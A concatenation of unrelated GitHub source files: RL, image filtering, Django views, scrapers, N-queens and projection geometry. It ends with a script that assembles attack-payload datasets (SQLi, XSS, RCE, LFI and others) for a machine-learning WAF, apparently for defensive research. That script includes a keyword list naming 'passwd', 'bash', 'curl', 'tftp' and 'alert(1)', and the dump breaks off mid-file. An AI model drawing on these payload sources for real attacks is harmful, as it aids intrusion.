self.args.agent == \"OWQMIX\":\n condition = td_error < 0\n w = torch.where(condition, ones, w)\n else:\n AttributeError(\"You have assigned an unexpected WQMIX learner!\")\n\n # calculate losses and train\n loss_central = self.mse_loss(q_tot_centralized, target_value.detach())\n loss_qmix = (w.detach() * (td_error ** 2)).mean()\n loss = loss_qmix + loss_central\n self.optimizer.zero_grad()\n loss.backward()\n self.optimizer.step()\n if self.scheduler is not None:\n self.scheduler.step()\n\n if self.iterations % self.sync_frequency == 0:\n self.policy.copy_target()\n lr = self.optimizer.state_dict()['param_groups'][0]['lr']\n self.writer.add_scalar(\"learning_rate\", lr, self.iterations)\n self.writer.add_scalar(\"loss_Qmix\", loss_qmix.item(), self.iterations)\n self.writer.add_scalar(\"loss_central\", loss_central.item(), self.iterations)\n self.writer.add_scalar(\"loss\", loss.item(), self.iterations)\n self.writer.add_scalar(\"predictQ\", q_tot_eval.mean().item(), self.iterations)\n","repo_name":"JoegameZhou/XuanPolicy","sub_path":"xuance_torch/learners/multi_agent_rl/wqmix_learner.py","file_name":"wqmix_learner.py","file_ext":"py","file_size_in_byte":4731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"14540185656","text":"import cv2\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pathlib\n\ndef mean_filter(img):\n \n mean_size = 3\n ker = np.array([[1]*mean_size]*mean_size)/(mean_size**2)\n xs = img.shape[0]-(ker.shape[0]-1)\n ys = img.shape[1]-(ker.shape[1]-1)\n conv_mat = np.zeros((xs,ys))\n \n for i in range(xs):\n for j in range(ys):\n conv_mat[i][j] = (img[i:i+ker.shape[0],j:j+ker.shape[1]]*ker).sum()\n \n return conv_mat.astype(np.uint8)\n\ndef median_filter(img):\n median_size = 3\n ker = np.array([[1]*median_size]*median_size)\n xs = img.shape[0]-(ker.shape[0]-1)\n ys = img.shape[1]-(ker.shape[1]-1)\n conv_mat = np.zeros((xs,ys))\n \n for i in range(xs):\n for j in range(ys):\n conv_mat[i][j] = np.median(img[i:i+ker.shape[0],j:j+ker.shape[1]])\n\n return conv_mat.astype(np.uint8)\n\ndef img_hist(name,img):\n\n\n xs = img.shape[0]\n ys = img.shape[1]\n x = range(0,256)\n y = [0]*256\n for i in range(xs):\n for j in range(ys):\n y[img[i][j]] += 1\n\n fig = plt.figure(name)\n plt.ylim(0,4000)\n plt.bar(x,y)\n plt.savefig(name)\n\nif __name__ == '__main__':\n \n image = cv2.imread('noise_image.png',0) #read the image\n result_folder = \"result\"\n \n pathlib.Path(f\"{result_folder}\").mkdir(parents=True, exist_ok=True)\n \n image_mean = mean_filter(image)\n image_median = median_filter(image)\n img_hist(result_folder+'/img_hist',image)\n img_hist(result_folder+'/img_mean_hist',image_mean)\n img_hist(result_folder+'/img_median_hist',image_median)\n cv2.imwrite(result_folder+'/img_mean.png',image_mean)\n cv2.imwrite(result_folder+'/img_median.png',image_median)\n cv2.waitKey(0)","repo_name":"Meitaiyang/Image-Filtering","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1712,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"70506213925","text":"from django.shortcuts import render, redirect\nfrom application.forms.itemsForm import itemForm\nfrom application.models.items import items\nfrom django.http import HttpResponse,JsonResponse\nfrom application.authenticate import Authentication\n\n\n# @Authentication.valid_user\n# def item(request):\n# item = items.objects.all();\n# return render(request, \"items/items.html\",{'item':item})\n\n@Authentication.valid_user\ndef item(request):\n limit=7\n page=1\n if request.method==\"POST\":\n if \"next\" in request.POST:\n page=(int(request.POST['page'])+1)\n elif \"prev\" in request.POST:\n page=(int(request.POST['page'])-1)\n tempoffset=page-1\n offset=tempoffset*limit\n item=items.objects.raw(\"select * from items where user_id = %s limit 7 offset %s\",[request.session['user_id'], offset])\n else:\n item=items.objects.raw(\"select * from items where user_id = %s limit 7 offset 0\",[request.session['user_id']])\n return render (request,\"items/items.html\",{'item':item, 'page': page})\n\n\n@Authentication.valid_user\ndef newItem(request):\n if request.method == \"POST\":\n if not request.POST._mutable:\n request.POST._mutable = True\n request.POST['user'] = request.session['user_id']\n itemsForm = itemForm(request.POST)\n itemsForm.save()\n return redirect(\"/items\")\n itemsForm = itemForm()\n return render(request, \"items/NewItems.html\",{'itemsForm':itemsForm})\n\n@Authentication.valid_user_include_id\ndef editItem(request,id):\n item = items.objects.get(id=id)\n return render(request,'items/editItems.html',{'item':item})\n\n@Authentication.valid_user_include_id\ndef update_item(request,id):\n item=items.objects.get(id=id)\n if not request.POST._mutable:\n request.POST._mutable = True\n request.POST['user'] = request.session['user_id']\n form=itemForm(request.POST,instance=item)\n form.save()\n return redirect('/items')\n\n@Authentication.valid_user_include_id\ndef delete_item(request, id):\n item = items.objects.get(id=id)\n item.delete()\n return redirect('/items')\n\n@Authentication.valid_user\ndef searchItem(request):\n item = items.objects.filter(item_name__icontains = request.GET['searchItem'],user_id=request.session['user_id']).values()\n return JsonResponse(list(item),safe=False)\n","repo_name":"PukarSubedi01/Web-Project","sub_path":"WebAssignment/accounting/application/views/itemsView.py","file_name":"itemsView.py","file_ext":"py","file_size_in_byte":2333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"74034525925","text":"import bs4 as bs\n # may need to change to bs3 dpepending on pythoon version\nimport urllib.request\n# import tkinter as tk\n# from tkinter.simpledialog import askstring, askinteger\n# from tkinter.messagebox import showerror\nimport string\nfrom unidecode import unidecode\n\n'''\n# it looks like having a dialog box is a lot of work; for future reference:\n https://stackoverflow.com/questions/40251509/how-to-open-a-tkinter-dialog-box-and-use-the-result-later-in-the-program\n https://stackoverflow.com/questions/10057672/correct-way-to-implement-a-custom-popup-tkinter-dialog-box\n https://stackoverflow.com/questions/34830906/taking-integer-and-string-input-from-gui-in-python\n\ndef string_from_dialog(title, text):\n root = Tk()\n root.result = simpledialog.askstring(title, text)\n root.withdraw()\n return root.result\n'''\n\ndef get_links(page):\n source = urllib.request.urlopen(page).read()\n soup = bs.BeautifulSoup(source, \"lxml\")\n links = []\n body = soup.body\n for paragraph in body.find_all(\"p\"):\n for url in paragraph.find_all(\"a\"):\n links.append(url.get(\"href\"))\n\n return links\n\n\ndef get_text(page):\n source = urllib.request.urlopen(page).read()\n soup = bs.BeautifulSoup(source, \"lxml\")\n text = []\n body = soup.body\n for paragraph in body.find_all(\"p\"):\n text.append(paragraph.text)\n text = \" \".join(text)\n new_text = text\n length = len(text)\n # print()\n # print(\"length:\",length)\n for i in range(len(text)):\n if text[length-i-1] == \"[\":\n # print(\"i:\",length-i-1)\n # new_text = new_text[:length-i-2] + new_text[length-i+1:]\n\n for j in range(i+1):\n # print(\"j:\",j,text[j+length-i-1])\n if text[j+length-i-1] == \"]\":\n\n new_text = new_text[:length-i-1] + new_text[length-i+j:]\n break\n\n\n rtn = unidecode(new_text)\n '''\n rtn = \"\"\n new_text = new_text.replace(\"\\u2013\", \"-\")\n new_text = new_text.replace(\"\\u2014\", \"--\")\n\n for char in new_text:\n if char in string.printable:\n rtn += char\n '''\n\n\n return rtn\n\n\n\n\n\n\n\nif __name__ == \"__main__\":\n print()\n print(get_text(\"https://en.wikipedia.org/wiki/Veiki_moraine\"))\n","repo_name":"bvorjohan/Wikipedia-Game","sub_path":"Scraper.py","file_name":"Scraper.py","file_ext":"py","file_size_in_byte":2256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"38896970974","text":"#!/usr/bin/env python\n#-*- coding: utf-8 -*-\n\nfrom multiprocessing import Pool\nfrom page_parsing import get_item_info_from, url_list, item_info, get_links_from\nfrom channel_extracing import channel_list\n\ndb_urls = [item['url'] for item in url_list.find()]\nindex_urls = [item['url'] for item in item_info.find()]\nx = set(db_urls)\ny = set(index_urls)\nrest_of_urls = x-y\n\ndef get_all_links_from(channel):\n for i in range(1, 100):\n get_links_from(channel, i)\n\n\nif __name__ == '__main__':\n pool = Pool(processes=6)\n # pool.map(get_all_links_from, channel_list) # 抓取所有商品链接(只需抓一次,此处未支持断点功能)\n pool.map(get_item_info_from, rest_of_urls) # 抓取商品详情页\n pool.close()\n pool.join()\n","repo_name":"mugglecoding/Plan-for-combating","sub_path":"week2/week2_homework/ganji/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":752,"program_lang":"python","lang":"en","doc_type":"code","stars":211,"dataset":"github-code","pt":"52"} +{"seq_id":"37338228953","text":"import re\nimport os\nimport sys\n\n\ndef handle_file(filename):\n filename = filename.strip()\n if not os.path.exists(filename): return\n fin = open(filename)\n lines = [line.strip() for line in fin.read().split(\"\\n\") if line.strip() != \"\"]\n fin.close()\n fout = open(filename, \"w\")\n title = lines[0]\n title = re.sub(r'^[# ]*', '', title).strip()\n print(\"# \" + title + \"\\n\", file=fout)\n for line in lines[1:]:\n line = re.sub(r\"^([a-zA-Z].*?:)\", \"**\\\\1**\", line)\n print(line + \"\\n\", file=fout)\n fout.close()\n\n\nfor line in sys.stdin:\n handle_file(line)\n","repo_name":"lzyerste/wiki2","sub_path":"en/pages/english/friends/re_md.py","file_name":"re_md.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"5251575218","text":"\"\"\"\nThis module contains a function which evaluates the classifier and logs the wrongly classified instances\n\"\"\"\n\n# importing csv for error tracking\nimport csv\n\ndef logErrorsInCSV(classifier,filename):\n \"\"\"\n This function evaluates the classifier and logs the wrongly classified instances.\n\n Input:\n classifier: trained MindMeld classifier\n filename: name of file in which evaluation results should be stored in\n\n Returns:\n Nothing.\n \"\"\"\n\n eval = classifier.evaluate()\n print(eval.get_stats()['stats_overall']['accuracy'])\n\n # writing incorrect results to .csv file\n out = csv.writer(open(filename,\"w\"), delimiter=';',quoting=csv.QUOTE_ALL)\n out.writerows(list(eval.incorrect_results()))","repo_name":"ptrckhmmr/ChatBot-for-cultural-institutions","sub_path":"Chatbot_DebuggingVersion/app/utilities/logErrors.py","file_name":"logErrors.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"293999369","text":"def print_board(board):\r\n for row in board:\r\n print(' '.join(row))\r\n print()\r\n\r\ndef is_safe(board, row, col, n):\r\n for i in range(col):\r\n if board[row][i] == 'Q':\r\n return False\r\n for i, j in zip(range(row, -1, -1), range(col, -1, -1)):\r\n if board[i][j] == 'Q':\r\n return False\r\n for i, j in zip(range(row, n, 1), range(col, -1, -1)):\r\n if board[i][j] == 'Q':\r\n return False\r\n \r\n return True\r\n\r\ndef solve_n_queens(board, col, n):\r\n if col == n:\r\n print_board(board)\r\n return True\r\n \r\n res = False\r\n for i in range(n):\r\n if is_safe(board, i, col, n):\r\n board[i][col] = 'Q'\r\n \r\n res = solve_n_queens(board, col + 1, n) or res\r\n \r\n board[i][col] = '.'\r\n \r\n return res\r\n\r\nn = int(input(\"Enter the value of n: \"))\r\nboard = [['.' for _ in range(n)] for _ in range(n)]\r\nsolve_n_queens(board, 0, n)\r\n\r\n","repo_name":"VenuAtluri2251421/dsa-lab","sub_path":"exp-11.py","file_name":"exp-11.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"11437534282","text":"import numpy as np\n\n\ndef _unit_vector(data, axis=None, out=None):\n \"\"\" Return ndarray normalized by length, i.e. Euclidean norm, along axis.\n\n >>> v0 = np.random.random(3)\n >>> v1 = _unit_vector(v0)\n >>> np.allclose(v1, v0 / np.linalg.norm(v0))\n True\n >>> v0 = np.random.rand(5, 4, 3)\n >>> v1 = _unit_vector(v0, axis=-1)\n >>> v2 = v0 / np.expand_dims(np.sqrt(np.sum(v0*v0, axis=2)), 2)\n >>> np.allclose(v1, v2)\n True\n >>> v1 = _unit_vector(v0, axis=1)\n >>> v2 = v0 / np.expand_dims(np.sqrt(np.sum(v0*v0, axis=1)), 1)\n >>> np.allclose(v1, v2)\n True\n >>> v1 = np.empty((5, 4, 3))\n >>> _unit_vector(v0, axis=1, out=v1)\n >>> np.allclose(v1, v2)\n True\n >>> list(_unit_vector([]))\n []\n >>> list(_unit_vector([1]))\n [1.0]\n\n \"\"\"\n if out is None:\n data = np.array(data, dtype=np.float64, copy=True)\n if data.ndim == 1:\n data /= np.sqrt(np.dot(data, data))\n return data\n else:\n if out is not data:\n out[:] = np.array(data, copy=False)\n data = out\n length = np.atleast_1d(np.sum(data * data, axis))\n np.sqrt(length, length)\n if axis is not None:\n length = np.expand_dims(length, axis)\n data /= length\n if out is None:\n return data\n\n\ndef rotation_matrix(th):\n \"\"\"\n :param th: vector of radians for rotation in x, y, z axis respectively\n :return: 3x3 rotation matrix\n \"\"\"\n Rx = [[1., 0., 0.],\n [0., np.cos(-th[0]), -np.sin(-th[0])],\n [0., np.sin(-th[0]), np.cos(-th[0])]]\n\n Ry = [[np.cos(-th[1]), 0., np.sin(-th[1])],\n [0., 1., 0.],\n [-np.sin(-th[1]), 0., np.cos(-th[1])]]\n\n Rz = [[np.cos(-th[2]), -np.sin(-th[2]), 0.],\n [np.sin(-th[2]), np.cos(-th[2]), 0.],\n [0., 0., 1.]]\n return np.dot(Rx, np.dot(Ry, Rz))\n\n\ndef _projection_matrix(point, normal, direction=None,\n perspective=None, pseudo=False):\n \"\"\"Return matrix to project onto plane defined by point and normal.\n\n Using either perspective point, projection direction, or none of both.\n\n If pseudo is True, perspective projections will preserve relative depth\n such that Perspective = dot(Orthogonal, PseudoPerspective).\n\n >>> P = _projection_matrix([0, 0, 0], [1, 0, 0])\n >>> np.allclose(P[1:, 1:], np.identity(4)[1:, 1:])\n True\n >>> point = np.random.random(3) - 0.5\n >>> normal = np.random.random(3) - 0.5\n >>> direct = np.random.random(3) - 0.5\n >>> persp = np.random.random(3) - 0.5\n >>> P0 = _projection_matrix(point, normal)\n >>> P1 = _projection_matrix(point, normal, direction=direct)\n >>> P2 = _projection_matrix(point, normal, perspective=persp)\n >>> P3 = _projection_matrix(point, normal, perspective=persp, pseudo=True)\n >>> P = _projection_matrix([3, 0, 0], [1, 1, 0], [1, 0, 0])\n >>> v0 = (np.random.rand(4, 5) - 0.5) * 20\n >>> v0[3] = 1\n >>> v1 = np.dot(P, v0)\n >>> np.allclose(v1[1], v0[1])\n True\n >>> np.allclose(v1[0], 3-v1[1])\n True\n\n \"\"\"\n M = np.identity(4)\n point = np.array(point[:3], dtype=np.float64, copy=False)\n normal = _unit_vector(normal[:3])\n if perspective is not None:\n # perspective projection\n perspective = np.array(perspective[:3], dtype=np.float64,\n copy=False)\n M[0, 0] = M[1, 1] = M[2, 2] = np.dot(perspective - point, normal)\n M[:3, :3] -= np.outer(perspective, normal)\n if pseudo:\n # preserve relative depth\n M[:3, :3] -= np.outer(normal, normal)\n M[:3, 3] = np.dot(point, normal) * (perspective + normal)\n else:\n M[:3, 3] = np.dot(point, normal) * perspective\n M[3, :3] = -normal\n M[3, 3] = np.dot(perspective, normal)\n elif direction is not None:\n # parallel projection\n direction = np.array(direction[:3], dtype=np.float64, copy=False)\n scale = np.dot(direction, normal)\n M[:3, :3] -= np.outer(direction, normal) / scale\n M[:3, 3] = direction * (np.dot(point, normal) / scale)\n else:\n # orthogonal projection\n M[:3, :3] -= np.outer(normal, normal)\n M[:3, 3] = np.dot(point, normal) * normal\n return M\n\n\ndef proj_iso_plane(pts, sad, gantry_deg, collimator_deg=90.0):\n # pts = pts.copy()\n \"\"\"\n ssd: source to axis distance\n gantry_ang: gantry rotation angle\n collimator_deg: collimator rotation angle\n pts: point or matrix of column vectors\n \"\"\"\n rot = [0.0, np.radians(collimator_deg), np.radians(gantry_deg)]\n src = [0, -sad, 0]\n pts_r = np.dot(rotation_matrix(rot), pts)\n\n pts_r = np.vstack((pts_r, np.ones(pts_r.shape[1])))\n pts_r = np.dot(_projection_matrix([0., 0., 0.], [0., 1., 0.], perspective=src), pts_r)\n pts_r = np.divide(pts_r[:3], pts_r[3])\n return pts_r\n","repo_name":"VarianAPIs/PyESAPI","sub_path":"pyesapi/tools/geometry.py","file_name":"geometry.py","file_ext":"py","file_size_in_byte":4841,"program_lang":"python","lang":"en","doc_type":"code","stars":58,"dataset":"github-code","pt":"52"} +{"seq_id":"28111448258","text":"# Napisz program, który będzie akceptował sekwencje słów\r\n# oddzielonych od siebie spacją i usunie duplikaty oraz zwróci\r\n# słowa posortowane alfanumerycznie.\r\n\r\nwyrazy = input(\"wpisz wyrazy oddzielone spacją: \")\r\nlista = sorted(wyrazy.split(\" \"))\r\nwynik =[]\r\nfor wyraz in lista:\r\n x = lista.count(wyraz)\r\n while x > 1:\r\n lista.remove(wyraz)\r\n x -= 1\r\n wynik.append(wyraz)\r\nprint(wynik)","repo_name":"Szyszuniec/100-zada-","sub_path":"zadanie 10.py","file_name":"zadanie 10.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"27692335322","text":"import random\nfrom itertools import chain\nimport pandas as pd\nfrom helpers.ioutils import SimpleFile\n\n\nclass DataSetProcessor:\n\n # def __init__(self):\n # pass\n\n @staticmethod\n def CreateBalancedDataSet():\n data_set = pd.read_csv(\"data/final/final.csv\")\n\n final_samples = {\"payload\": [], \"category\": []}\n categories = [\"xss\", \"xxe\", \"injection\", \"rce\", \"crlf\", \"deserialize\", \"lfi-ldf\", \"openredirect\", \"clean\"]\n\n # data_set = pd.DataFrame()\n for index, row in data_set.iterrows():\n if row[\"category\"] in categories:\n # print(row['category'])\n if KeyExist(row[\"category\"], final_samples):\n\n if CountKeys(row[\"category\"], final_samples) <= 400:\n final_samples[\"payload\"].append(row[\"payload\"])\n final_samples[\"category\"].append(row[\"category\"])\n else:\n continue\n else:\n if CountKeys(row[\"category\"], final_samples) <= 400:\n final_samples[\"payload\"].append(row[\"payload\"])\n final_samples[\"category\"].append(row[\"category\"])\n\n interesting_clean_keywords = [\"xss\", \"crlf\", \"xxe\", \"sqli\", \"injection\", \"lfi\", \"passwd\", \"etc\", \"onmouseover\",\n \"onload\", \"192.168.1.100:9887\", \"127.0.0.1\", \"10.255.255.255\", \"host\", \"localhost\"\n \"10.0.0.0\",\n \"172.31.255.255\", \"192.168.255.255\", \"192.168.0.0\", \"172.16.0.0\", \"wait\", \"count\",\n \"select\", \"google\", \"google.com\", \"www.google.com\", \"alert\", \"alert(1)\"\n \"bin\", \"bash\",\n \"curl\", \"where\", \"char\", \"exec\", \"cgi\", \"extractvalue\", \"1\", \"2\", \"3\"\n \"tftp\",\n \"192.168\", \"192.\", \"127.\", \"'\", \"<>\",\n \"example.com\", \"cmd\", \"<>@!@#$%^&*()_+\", \"example.com<<>>@\",\n \"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) \"\n \"Chrome/36.0.1985.125 Safari/537.36\"]\n\n for item in interesting_clean_keywords:\n final_samples[\"payload\"].append(item)\n final_samples[\"category\"].append(\"clean\")\n # print(len(final_samples[\"payload\"]))\n final_samples = pd.DataFrame.from_dict(final_samples).sample(frac=1, random_state=555)\n final_samples.to_csv(\"data/final/final_sampled.csv\", index=False)\n print(\"Final sample created in data directory as well\")\n\n @staticmethod\n def ProcessDataSets():\n rce = [] # unix , windows, powershell, SSTI\n injection = [] # ldap, sql , nosql\n xss = [] # variants\n xxe = [] # variants\n lfi_lfd = [] # also sensitive files\n open_redirect = []\n crlf = []\n deserialize = []\n clean = []\n\n # # some entities from OWASP coreruleset\n\n SimpleFile.AppendFileToList(lfi_lfd, \"data/sources/coreruleset/lfi.txt\")\n SimpleFile.AppendFileToList(rce, \"data/sources/coreruleset/powershell.txt\")\n SimpleFile.AppendFileToList(rce, \"data/sources/coreruleset/rce.txt\")\n\n # entities from payloadidentifier\n\n SimpleFile.AppendFileToList(lfi_lfd, \"data/sources/payloadidentifer/datasets/file-inclusion/ALL_FILES.txt\")\n SimpleFile.AppendFileToList(lfi_lfd, \"data/sources/payloadidentifer/datasets/path-traversal/ALL_FILES.txt\")\n SimpleFile.AppendFileToList(rce, \"data/sources/payloadidentifer/datasets/rce/ALL_FILES.txt\")\n SimpleFile.AppendFileToList(injection, \"data/sources/payloadidentifer/datasets/sql/ALL_FILES.txt\")\n SimpleFile.AppendFileToList(xss, \"data/sources/payloadidentifer/datasets/xss/ALL_FILES.txt\")\n SimpleFile.AppendFileToList(xxe, \"data/sources/payloadidentifer/datasets/xxe/ALL_FILES.txt\")\n\n # entities from PayloadAllTheThings\n\n SimpleFile.AppendDirToList(lfi_lfd, 'data/sources/PayloadsAllTheThings/Directory Traversal/')\n SimpleFile.AppendDirToList(lfi_lfd, 'data/sources/PayloadsAllTheThings/File Inclusion/')\n SimpleFile.AppendDirToList(lfi_lfd, 'data/sources/PayloadsAllTheThings/Insecure Management Interface')\n SimpleFile.AppendDirToList(rce, 'data/sources/PayloadsAllTheThings/Command Injection/')\n SimpleFile.AppendDirToList(injection, 'data/sources/PayloadsAllTheThings/SQL Injection/')\n SimpleFile.AppendDirToList(injection, 'data/sources/PayloadsAllTheThings/LDAP Injection/')\n SimpleFile.AppendDirToList(injection, 'data/sources/PayloadsAllTheThings/NoSQL Injection/')\n SimpleFile.AppendDirToList(crlf, 'data/sources/PayloadsAllTheThings/CRLF Injection/')\n SimpleFile.AppendDirToList(xss, 'data/sources/PayloadsAllTheThings/XSS Injection/')\n SimpleFile.AppendDirToList(xxe, 'data/sources/PayloadsAllTheThings/XXE Injection/')\n SimpleFile.AppendDirToList(open_redirect, 'data/sources/PayloadsAllTheThings/Open Redirect/')\n\n # # entities from BURP XSS Cheat sheet\n #\n SimpleFile.AppendFileToList(xss, 'data/sources/burp_xss_cheatsheet.txt')\n\n # # deserialization\n SimpleFile.AppendFileToList(deserialize, 'data/sources/ysoserial_payloads.txt')\n\n # entities from ML based WAF\n\n # print(MlJson['type'].unique())\n # MLJsonTypes = ['valid' 'xss' 'sqli' 'path-traversal' 'cmdi']\n\n MlJson = pd.read_json('data/sources/ml_based_waf.json')\n\n clean.append(MlJson.where(MlJson['type'] == 'valid').dropna(thresh=1)['pattern'].values.tolist())\n injection.append(MlJson.where(MlJson['type'] == 'sqli').dropna(thresh=1)['pattern'].values.tolist())\n xss.append(MlJson.where(MlJson['type'] == 'xss').dropna(thresh=1)['pattern'].values.tolist())\n rce.append(MlJson.where(MlJson['type'] == 'cmdi').dropna(thresh=1)['pattern'].values.tolist())\n lfi_lfd.append(MlJson.where(MlJson['type'] == 'path-traversal').dropna(thresh=1)['pattern'].values.tolist())\n\n # entities from ML based WAF CSV\n\n # print(MlCsv['injection_type'].unique())\n # ['LEGAL' 'XSS' 'SHELL' 'SQL']\n\n MlCsv = pd.read_csv('data/sources/ml_base_waf_payloads.csv')\n # clean.append(MlCsv.where(MlCsv['injection_type'] == 'LEGAL').dropna(thresh=1)['payload'].values.tolist())\n injection.append(MlCsv.where(MlCsv['injection_type'] == 'SQL').dropna(thresh=1)['payload'].values.tolist())\n rce.append(MlCsv.where(MlCsv['injection_type'] == 'SHELL').dropna(thresh=1)['payload'].values.tolist())\n xss.append(MlCsv.where(MlCsv['injection_type'] == 'XSS').dropna(thresh=1)['payload'].values.tolist())\n\n # # entities from MSS WAF\n #\n # # print(MSSCvs['injection_type'].unique())\n # # ['LEGAL' 'XSS' 'SHELL' 'SQL']\n #\n MSSCvs = pd.read_csv('data/sources/mss_waf_allpayload.csv')\n\n # clean.append(MSSCvs.where(MSSCvs['injection_type'] == 'LEGAL').dropna(thresh=1)['payload'].values.tolist())\n injection.append(MSSCvs.where(MSSCvs['injection_type'] == 'SQL').dropna(thresh=1)['payload'].values.tolist())\n rce.append(MSSCvs.where(MSSCvs['injection_type'] == 'SHELL').dropna(thresh=1)['payload'].values.tolist())\n xss.append(MSSCvs.where(MSSCvs['injection_type'] == 'XSS').dropna(thresh=1)['payload'].values.tolist())\n #\n\n # entities from WAF dataset\n\n # print(MSSCvs['injection_type'].unique())\n # ['LEGAL' 'XSS' 'SHELL' 'SQL']\n\n WAFCsv = pd.read_csv('data/sources/waf_dataset.csv')\n # print(WAFCsv['Types'].unique())\n # ['xss' 'sql' 'nosql' 'lfi' 'shell' 'ssti' 'crlf' 'ssi' 'valid']\n\n clean.append(WAFCsv.where(WAFCsv['Types'] == 'valid').dropna(thresh=1)['Payloads'].values.tolist())\n injection.append(WAFCsv.where(WAFCsv['Types'] == 'nosql').dropna(thresh=1)['Payloads'].values.tolist())\n injection.append(WAFCsv.where(WAFCsv['Types'] == 'sql').dropna(thresh=1)['Payloads'].values.tolist())\n rce.append(WAFCsv.where(WAFCsv['Types'] == 'shell').dropna(thresh=1)['Payloads'].values.tolist())\n rce.append(WAFCsv.where(WAFCsv['Types'] == 'ssi').dropna(thresh=1)['Payloads'].values.tolist())\n xss.append(WAFCsv.where(WAFCsv['Types'] == 'xss').dropna(thresh=1)['Payloads'].values.tolist())\n rce.append(WAFCsv.where(WAFCsv['Types'] == 'ssti').dropna(thresh=1)['Payloads'].values.tolist())\n crlf.append(WAFCsv.where(WAFCsv['Types'] == 'crlf').dropna(thresh=1)['Payloads'].values.tolist())\n lfi_lfd.append(WAFCsv.where(WAFCsv['Types'] == 'lfi').dropna(thresh=1)['Payloads'].values.tolist())\n\n injection_final_total = list(chain.from_iterable(injection))\n injection_final_unique = set(injection_final_total)\n\n print(\"#\" * 20 + \" Payload Information \" + \"#\" * 20)\n print(\"Total Injection (SQL/NoSQL) Payloads: \" + str(len(injection_final_total)) +\n \"\\nTotal unique (SQL/NoSQL) payloads: \" +\n str(len(injection_final_unique)))\n\n rce_final_total = list(chain.from_iterable(rce))\n rce_final_unique = set(rce_final_total)\n\n print(\"Total RCE Payloads: \" + str(len(rce_final_total)) + \"\\nTotal unique payloads: \" +\n str(len(rce_final_unique)))\n\n final_lfi_lfd_total = list(chain.from_iterable(lfi_lfd))\n final_lfi_lfd_unique = set(final_lfi_lfd_total)\n\n print(\"Total LFI/LFD Payloads: \" + str(len(final_lfi_lfd_total)) + \"\\nTotal unique LFI/LFD payloads: \" +\n str(len(final_lfi_lfd_unique)))\n\n final_xss_total = list(chain.from_iterable(xss))\n final_xss_unique = set(final_xss_total)\n\n print(\"Total XSS Payloads: \" + str(len(final_xss_total)) + \"\\nTotal unique XSS payloads: \" +\n str(len(final_xss_unique)))\n\n final_crlf_total = list(chain.from_iterable(crlf))\n final_crfl_unique = set(final_crlf_total)\n\n print(\"Total CRLF Payloads: \" + str(len(final_crlf_total)) + \"\\nTotal unique CRLF payloads: \" +\n str(len(final_crfl_unique)))\n\n final_xxe_total = list(chain.from_iterable(xxe))\n final_xxe_unique = set(final_xxe_total)\n\n print(\"Total XXE Payloads: \" + str(len(final_xxe_total)) + \"\\nTotal unique XXE payloads: \" +\n str(len(final_xxe_unique)))\n\n final_openredirect_total = list(chain.from_iterable(open_redirect))\n final_openredirect_unique = set(final_openredirect_total)\n\n print(\"Total OpenRedirect Payloads: \" + str(\n len(final_openredirect_total)) + \"\\nTotal unique OpenRedirect payloads: \" +\n str(len(final_openredirect_unique)))\n\n final_deserialize_total = list(chain.from_iterable(deserialize))\n final_deserialize_unique = set(final_deserialize_total)\n\n print(\"Total Deserialize Payloads: \" + str(\n len(final_deserialize_total)) + \"\\nTotal unique Deserialize payloads: \" +\n str(len(final_deserialize_unique)))\n\n final_clean_total = list(chain.from_iterable(clean))\n final_clean_unique = set(final_clean_total)\n\n print(\"#\" * 20 + \" Total Malicious Payloads \" + \"#\" * 20)\n total_malicious = len(final_deserialize_total) + len(final_xss_total) + len(final_xxe_unique) + len(\n injection_final_unique) + \\\n len(final_openredirect_unique) + len(final_crfl_unique) + len(final_openredirect_total) + len(\n rce_final_unique)\n print(\"Total : \" + str(total_malicious))\n\n print(\"Total Clean Payloads: \" + str(len(final_clean_total)) + \"\\nTotal unique Clean payloads: \" +\n str(len(final_clean_unique)))\n\n # print(\"How much more clean data we have\")\n # diff = len(final_clean_unique) - total_malicious\n # percent = format(diff / len(final_clean_unique), \".2f\")\n\n # get unique payloads with more 500 samples and fix random state\n sample_needed = int(total_malicious / 2)\n clean_df = pd.DataFrame(final_clean_unique, columns=['Payloads'])\n clean_final_balance = clean_df.sample(n=sample_needed, replace=False, random_state=555).values.tolist()\n\n print(\"Selected Clean Samples : \" + str(len(clean_final_balance)))\n\n # let's finally merge and shuffle\n final_list = {\"payload\": [], \"category\": []}\n\n for item in injection_final_unique:\n final_list[\"payload\"].append(item)\n final_list[\"category\"].append(\"injection\")\n\n for item in rce_final_unique:\n final_list[\"payload\"].append(item)\n final_list[\"category\"].append(\"rce\")\n\n for item in final_xss_unique:\n final_list[\"payload\"].append(item)\n final_list[\"category\"].append(\"xss\")\n\n for item in final_xxe_unique:\n final_list[\"payload\"].append(item)\n final_list[\"category\"].append(\"xxe\")\n\n for item in final_crfl_unique:\n final_list[\"payload\"].append(item)\n final_list[\"category\"].append(\"crlf\")\n\n for item in final_lfi_lfd_unique:\n final_list[\"payload\"].append(item)\n final_list[\"category\"].append(\"lfi-ldf\")\n\n for item in final_openredirect_unique:\n final_list[\"payload\"].append(item)\n final_list[\"category\"].append(\"openredirect\")\n\n for item in final_deserialize_unique:\n final_list[\"payload\"].append(item)\n final_list[\"category\"].append(\"deserialize\")\n\n for item in clean_final_balance:\n final_list[\"payload\"].append(item)\n final_list[\"category\"].append(\"clean\")\n\n finale = {\"payload\": final_list[\"payload\"], \"category\": final_list[\"category\"]}\n\n # let's shuffle it and write the final dataset as CSV\n\n print(\"#\" 